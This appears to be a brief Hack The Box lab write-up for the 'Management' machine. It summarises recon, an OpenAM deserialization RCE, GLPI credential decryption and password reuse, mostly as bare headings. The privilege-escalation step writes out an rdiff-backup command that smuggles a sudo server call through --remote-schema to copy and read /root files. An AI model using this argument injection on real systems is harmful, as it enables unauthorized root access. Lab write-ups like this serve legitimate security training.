~ / writeups / management

Management

Hack The Box · Easy · Linux

Easy Linux User + Root owned

Machine Overview

Field Value
Name Management
Difficulty Easy
OS Linux (Ubuntu, nginx)
IP 10.129.146.178
Vhosts management.htb (main SPA), sso.management.htb (OpenAM 16.0.5)
Key components OpenAM 16.0.5 (SSO), OpenDJ (LDAP dir server), GLPI (service desk), rdiff-backup 2.2.6
Open ports 22 (SSH), 80/443 (nginx), 1689 + 33771 (OpenDJ JMX / Java RMI), 4444 (SSL LDAP admin connector), 50389 (OpenDJ LDAP)

Flags

Flag Path Value
User /home/owen/user.txt [REDACTED]
Root /root/root.txt [REDACTED]

Attack Chain

1. Reconnaissance

2. Initial Access — OpenAM Pre-Auth Deserialization RCE (CVE-2026-33439)

3. GLPI LDAP Credential Decryption

4. Password Reuse → User Flag

5. Privilege Escalation — rdiff-backup Argument Injection

rdiff-backup --remote-schema 'sudo /usr/bin/rdiff-backup --server --restrict-path /opt/backup --restrict-mode read-only --restrict-path %s' backup /::/root /tmp/rootbak
cat /tmp/rootbak/root.txt

Techniques Demonstrated

Tools Used

nmap, curl, Python 3, Temurin JDK 21 (javac/java), cve-2026-33439-poc, mysql (target), php/libsodium (target), paramiko (SSH), rdiff-backup.

← all writeups